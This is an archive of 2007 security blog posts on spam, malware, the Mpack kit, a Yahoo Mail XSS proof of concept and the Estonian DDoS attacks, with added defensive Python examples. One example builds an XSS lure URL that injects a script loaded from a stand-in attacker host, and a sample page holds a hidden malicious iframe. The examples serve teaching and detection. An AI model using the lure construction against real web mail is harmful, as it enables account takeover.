Wednesday, June 27, 2007

PDF spam on the rise.

A large “pump-and-dump” stock spam campaign is underway, but rather than carrying the spam content in an image file, this campaign puts it inside a .PDF attachment. The stock spam is believed to be sent from Stration-infected computers: the campaign closely followed a new W32/Stration worm mass-mailing that carried a number of .PDF files, and Stration has been associated with pump-and-dump spam in the past. The current spam contains one or more .PDF files, has a randomly generated subject line and sender name, and a blank message body. The .PDF files contain images that look very similar to the earlier image-based stock spam. Most Belgian enterprises seem to be flooded with this new type of spam.
Please be careful before opening this type of email if your anti-spam solution did not remove it.
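The traits listed above (blank body, one or more PDF attachments, a PDF that is nothing but a picture, a random-looking subject) are exactly what a mail gateway can score on. The following is an added example, not code from the original post; the sample message and the two PDF skeletons are constructed here (the PDFs are minimal hand-written object lists, not real files from the campaign), and the "random subject" regex is a heuristic assumption of mine, not a rule stated in the post.

```python
"""Heuristic triage of a PDF pump-and-dump spam message (added example)."""
from __future__ import annotations

import email
import re
from email.message import EmailMessage
from email.policy import default

# Constructed sample: a PDF that declares an image XObject and no font at all.
IMAGE_ONLY_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /XObject /Subtype /Image /Width 600 /Height 400 >> endobj\n"
    b"2 0 obj << /Type /Page /Resources << /XObject << /Im0 1 0 R >> >> >> endobj\n"
    b"%%EOF\n"
)

# Constructed sample: a PDF with real text (a font resource and a text block).
TEXT_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Font /Subtype /Type1 /BaseFont /Helvetica >> endobj\n"
    b"2 0 obj << /Length 44 >> stream\nBT /F1 12 Tf (Quarterly invoice) Tj ET\nendstream endobj\n"
    b"%%EOF\n"
)


def build_message(body: str, pdfs: list, subject: str, sender: str) -> bytes:
    """Assemble a multipart message with the given PDF attachments (test input)."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = subject
    msg.set_content(body)
    for i, data in enumerate(pdfs):
        msg.add_attachment(data, maintype="application", subtype="pdf",
                           filename=f"report{i}.pdf")
    return msg.as_bytes()


def pdf_is_image_only(data: bytes) -> bool:
    """True when the PDF declares image XObjects but no font, i.e. no real text."""
    has_image = b"/Subtype /Image" in data or b"/Subtype/Image" in data
    has_font = b"/Type /Font" in data or b"/Type/Font" in data
    return has_image and not has_font


def score_message(raw: bytes) -> dict:
    """Return the individual indicators and a total score for one raw message."""
    msg = email.message_from_bytes(raw, policy=default)
    body_text = ""
    pdfs = []
    for part in msg.walk():
        if part.get_content_disposition() == "attachment":
            if part.get_content_type() == "application/pdf":
                pdfs.append(part.get_payload(decode=True))
        elif part.get_content_type() == "text/plain":
            body_text += part.get_content()
    subject = msg.get("Subject", "")
    indicators = {
        "blank_body": body_text.strip() == "",
        "pdf_attachment": len(pdfs) > 0,
        "image_only_pdf": any(pdf_is_image_only(p) for p in pdfs),
        # Assumption: the campaign's random subjects look like 2-4 plain words,
        # no digits and no punctuation. Tune this against your own spam traps.
        "random_subject": bool(re.fullmatch(r"(?:[A-Za-z]{2,12} ?){2,4}", subject)),
    }
    indicators["score"] = sum(1 for v in indicators.values() if v is True)
    return indicators
```

A score of 3 or 4 is a strong quarantine signal; a single PDF attachment on its own (score 1) is normal business mail and must not be blocked, which is why the indicators are reported separately rather than as one boolean.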

comp.virus is officially dead.

comp.virus is officially dead...
Of course, in any sense comp.virus has been gone for a good long time; the group itself was slated for removal on June 25, 2007. I still have messages from it on my PC, from back before I even got on the Internet: I read comp.virus thanks to a FidoNet gateway. Oh yes, there were the Fido VIRUS and VIRUS_INFO echoes (in fact those still exist, though they're mostly unused nowadays).
Of course it wasn't long after I found comp.virus that it fell out of use (for reasons that Nick FitzGerald has probably explained too many times already) and alt.comp.virus was used as a substitute (which proved interesting for all sorts of reasons). alt.comp.virus (and the more recent alt.comp.anti-virus) are unmoderated, however, and without that control over the quality of the content most of the knowledgeable folks moved on to less noisy environments.
I'm feeling old now. The removal of comp.virus is like going back to your old neighbourhood and discovering that your favourite spot has been torn down and replaced by a large supermarket.

Monday, June 25, 2007

Cabir mobile virus author arrested?

On Saturday Spanish police arrested a 28-year-old man on suspicion of creating and spreading a virus that affected over 100,000 high-end mobile phones. The man was detained in the eastern coastal city of Valencia following an investigation that lasted over seven months. It is the first time that the creator of a virus targeting mobile phones has been arrested in Spain. Though no name was given, I assume it was Vallez of 29A, the author of the first mobile malware, Cabir.

Friday, June 22, 2007

Belgian Federal Police website hacked!

This afternoon around 14:00 the website of the Federal Police was hacked. For several minutes you could see a message from the 'Spycheck Team'. It's the first time this has happened to the Belgian Federal Police website. The page was removed within minutes; however, the website still seems to have some problems and, at the time of writing, shows a message that the site is temporarily unavailable.
The page (www.polfed-fedpol.be) showed 'hacked by Spynet' and
continued with a text in French, which translates as:
"Be happy, a 17-year-old kid hacked the website of the Belgian Police.
The security of your site reflects the Police's lack of competence well.
Webmaster: go back and study, it will do you good.
Government: recruit a police force of a better calibre, this one looks like nothing at all."

Wednesday, June 20, 2007

Mpack attacks and Yahoo's cross-site scripting POC.

A malware distribution and attack kit sold commercially through underground channels on the Internet has compromised hundreds of thousands of systems in the past six months, including an epidemic of infections that hit Italian Web servers this past weekend, according to security and antivirus firms. Known as Mpack, the kit consists of commercial-grade software components written in PHP and apparently sold by a group of Russian programmers. The software, which comes with a year of support, was first mentioned in an analysis by antivirus firm Panda Software. In mid-May, Panda stated that the software had compromised at least 100,000 computers. The kit uses techniques similar to previous attacks that leverage legitimate Web sites that have been compromised to redirect visitors to malicious download sites. The kit's landing page reads the HTTP headers of the visitor's request (the User-Agent in particular) to pick the exploit that matches that visitor's specific browser. The software drew attention this past weekend because a number of compromised Web sites in Italy redirected visitors to malicious sites running Mpack, according to antivirus firm Trend Micro. The Mpack kit sells for around 1,000 dollars. If you've been following the media, you'll know that the majority of affected sites are in Italy. Although it hasn't caused anything like the havoc wreaked by the worm epidemics of 2004 and 2005, Italian TV went so far as to warn viewers of the danger...
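The defensive task on the web-server side is to find the redirect that was planted in the legitimate pages. The scanner below is an added example, not code from the original post or from the Mpack kit; it assumes the injection takes the common form of a hidden iframe (zero-sized, or hidden via CSS) or a meta refresh pointing to a host other than the site's own, which the post does not spell out. The sample HTML and all host names are constructed for illustration.

```python
"""Scan an HTML page for injected off-site or hidden redirects (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: an ordinary page with two planted redirects and one
# legitimate same-site iframe that must not be flagged.
SAMPLE_HTML = """<html><head><title>Hotel Example</title>
<meta http-equiv="refresh" content="0;url=http://cdn.example-site.invalid/page2">
</head><body>
<p>Welcome to our hotel.</p>
<iframe src="http://dl.bad.invalid/in.cgi?3" width="0" height="0" style="border:0"></iframe>
<iframe src="/map" width="400" height="300"></iframe>
</body></html>"""


def is_hidden(attrs: dict) -> bool:
    """Zero/one-pixel frames or CSS-hidden elements are not meant to be seen."""
    w = attrs.get("width", "").strip().lower().rstrip("px")
    h = attrs.get("height", "").strip().lower().rstrip("px")
    style = attrs.get("style", "").replace(" ", "").lower()
    return (w in ("0", "1") or h in ("0", "1")
            or "display:none" in style or "visibility:hidden" in style)


class RedirectFinder(HTMLParser):
    """Collect iframes and meta refreshes that are off-site or hidden."""

    def __init__(self, page_host: str):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def _offsite(self, url: str) -> bool:
        host = urlparse(url).hostname
        return bool(host) and host.lower() != self.page_host

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe" and "src" in a:
            offsite, hidden = self._offsite(a["src"]), is_hidden(a)
            if offsite or hidden:
                self.findings.append({"kind": "iframe", "url": a["src"],
                                      "offsite": offsite, "hidden": hidden})
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content looks like "0;url=http://..."; only the target matters here
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content", ""), re.I)
            if m and self._offsite(m.group(1)):
                self.findings.append({"kind": "meta-refresh", "url": m.group(1),
                                      "offsite": True, "hidden": True})


def find_injected_redirects(html: str, page_host: str) -> list:
    """Return a list of suspicious redirect findings for one page."""
    parser = RedirectFinder(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings
```

Run it over every HTML file the web server serves (and over what the server actually returns on the wire, since the injection may live in a template or a PHP include rather than in a static file); a same-site, visible iframe such as the map in the sample is ignored, while any off-site target or any frame the visitor could not see is reported for review.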
And that's not all ....
Proof-of-concept code for a cross-site scripting (XSS) exploit against Yahoo! Mail was discovered recently. The PoC comprises two components. The first is a CGI script, hosted on a web server, that does the actual work; it is meant to execute whenever a user visits a page hosted on that server. The second component takes the path of that CGI script and appends a Yahoo URL string to it, generating an entirely new URL. That URL can be sent to an unsuspecting user in an innocent-looking email or Yahoo! Messenger message; when the user clicks it, his Yahoo account is compromised. Fortunately this PoC does nothing more than display an email from the user's inbox in a web page outside Yahoo's domain. Despite its limited functionality, the PoC has made its point: a web mail account can be compromised by a single click on a link.
It goes without saying that both are of course detected by your AV product.
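What makes the link dangerous is that the web mail page echoes part of the URL into its own HTML, so a script tag hidden in a parameter runs with the web mail's origin and can read the inbox. The following is an added example and not the Yahoo PoC itself: it models the shape of the attack with a lure URL whose parameter carries a script tag pointing at an attacker's server, a page that reflects the parameter raw (the bug) and the same page with output encoding (the fix). All host names, paths and the parameter name are assumptions for illustration.

```python
"""Reflected XSS: raw reflection versus HTML-escaped output (added example)."""
import html
from urllib.parse import parse_qs, urlencode, urlparse

# Assumed attacker-hosted script; the real PoC's path is not given in the post.
ATTACKER_SCRIPT = "http://attacker.invalid/cgi-bin/steal.cgi"


def build_lure_url(target_base: str, param: str) -> str:
    """Craft the link a victim would receive: target page plus injected script tag."""
    payload = f'<script src="{ATTACKER_SCRIPT}"></script>'
    return f"{target_base}?{urlencode({param: payload})}"


def _param(url: str, param: str) -> str:
    return parse_qs(urlparse(url).query).get(param, [""])[0]


def render_vulnerable(url: str, param: str) -> str:
    """Page that echoes the parameter straight into HTML: the injected tag becomes markup."""
    return f"<html><body>Search results for: {_param(url, param)}</body></html>"


def render_fixed(url: str, param: str) -> str:
    """Same page with output encoding: the parameter stays data, never markup."""
    safe = html.escape(_param(url, param), quote=True)
    return f"<html><body>Search results for: {safe}</body></html>"


def loads_offsite_script(page: str) -> bool:
    """Crude check: does the rendered page contain a live external script tag?"""
    return "<script src=" in page
```

Note that the lure URL genuinely points at the web mail host; no amount of "only click links to sites you trust" helps the user here. The fix is on the server: encode every reflected value for the context it lands in.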

Tuesday, June 19, 2007

NATO and the Estonian DDoS attacks.

Defense ministers of the North Atlantic Treaty Organization have asked for cybersecurity to be beefed up following last month's attacks on Web servers and network infrastructure in Estonia.
The concerns surfaced at the annual meeting of NATO defense ministers in Brussels, Belgium, a two-day meeting largely dedicated to the controversial topic of deploying missile defense systems in Europe. However, the recent attacks on government Web sites and systems in the northern European country of Estonia became a significant second point of discussion. The attacks began on April 28 (I reported on them here on June 3, 2007), following violent clashes between the Estonian police and ethnic Russians in the country over the removal of a Red Army monument that symbolizes the defeat of Nazi Germany by the Soviet Union during World War II, but is also a reminder to Estonians of the more than four decades of Soviet occupation. While the Estonian government has accused Russia of masterminding the attacks, the evidence appears to indicate that botmasters sympathetic to the ethnic Russian cause were responsible. A 19-year-old student was detained and questioned in the case, but has not yet been charged. It's interesting to see this evolution, as I expect that NATO's behaviour in such cases will change in the future.

Tuesday, June 12, 2007

I still love my old TI calculator, without a virus.

Last week anti-virus vendors received a sample of a virus written for the programmable calculator TI-89, produced by Texas Instruments. This calculator runs on the Motorola 68000 processor and has computing power comparable to the first IBM PCs. It also offers cable connectivity to a PC and to other calculators to exchange programs. Essentially, this calculator is a small computer that runs programs. One can get a wide variety of games for it, from classic Tetris and Pacman to full-blown chess. There is little security built in, so programs have full access to all other programs, just as in the days of DOS on IBM PCs. Reliable detection of this proof-of-concept virus (TIOS/Tigraa) is easy, even though it attempts to hide by obfuscating the call to the virus body within the infected file. The problem is that there is no AV software for calculators yet, so protection can only be built on the PC side. That would not block propagation between calculators should a similar virus ever get into the field. Fortunately, the chances of this happening are rather slim. It's worth noting that more and more mobile devices (pocket organizers, smartphones, Internet tablets, calculators, etc.) receive enough computing power, and not enough security features, to become breeding grounds for malicious code. I urge developers for all mobile devices to make the necessary investment in securing the environment and the programs they create.
Last week I dug up my 30-year-old programmable TI calculator, with far fewer possibilities; however, I still remember my own first programs (SkippyHopper, BioGroove, etc.) on this calculator, which were 'fantastic' for that time. I was only concentrating on creating some games at that moment. I advise the author of this virus (Piotr Bania) to concentrate on creating more useful programs in the future.

Yahoo! I got two vulnerabilities!

Two vulnerabilities in Yahoo! Messenger have been disclosed publicly. Both have been shown to allow arbitrary code execution, which means it may be only a matter of time before they are exploited by malicious users. The first is a missing boundary check in ywcupl.dll (the Yahoo! Webcam Upload ActiveX control): assigning a very long string to the “Server” property and then calling the “Send()” method causes a stack-based buffer overflow. The second is a missing boundary check in ywcvwr.dll (the Yahoo! Webcam Viewer ActiveX control). Not to worry though: Yahoo! has already released an update that fixes these issues. Go to this site to read more about the vulnerabilities and how to update your Yahoo! Messenger.
Hmmm, time to check my own Yahoo Messenger... well, I don't use it often... but that's of course one of the problems, isn't it?

Thursday, June 07, 2007

Google and Security ... Oh no.

A lot of press coverage about Google's security plans. Some of what we saw in the last few weeks: 'WOW, Google is ahead in security', 'Google is planning serious security measures', 'Google will be a new security vendor'... Just a week after launching the Google Online Security Blog to "periodically provide updates on recent trends, interesting findings, and efforts related to online security," Google acquired the security developer GreenBorder, whose software creates a sort of virtualized Web browser for safer Internet use. Both developments show that Google is taking online security more seriously, yes, but it is definitely not at the point where it will compete with the established security, anti-virus or anti-malware vendors. I can say to everybody, and definitely to the press: please don't exaggerate, as Google's steps into security are still very basic. So please stop making 'noise' about Google investing heavily in security! What a joke!

Sunday, June 03, 2007

Estonian DDoS attacks and 'De Morgen'

I was interviewed by the well-known newspaper 'De Morgen' last Friday. You can find the full article on the press page of my website. For those who missed the news about the Russian DDoS attack on Estonia, I give a short overview here. It happened about a month ago.
The trouble between the Estonian government and Estonia’s ethnic Russians has taken on a new dimension in the online world.
According to Ars Technica:
Cyber-warfare on an unprecedented scale hammered Estonian web sites during the last weeks of April, in the aftermath of the government’s controversial decision to relocate a Soviet-era war monument from the center of Tallinn to the suburbs. Two days of rioting by ethnic Russians, who saw this as an attack on their heritage and on minority rights, quickly transitioned from the real to the virtual world, as government web sites came under DDoS attacks so severe that many agencies shut off access to IP addresses outside Estonia for several days.
Since it seems clear that the attacks come from Russia (some allegedly originating from the office of Russia’s president Putin), Estonia is raising the issue with NATO. After all, when a NATO member finds itself under attack, it is NATO's function to get involved, considering the whole alliance under attack.

However, it's not as clear as you might think, as this kind of attack is not yet officially recognised as an act of war. It's a gap in international law. In my opinion it's time to change this ASAP!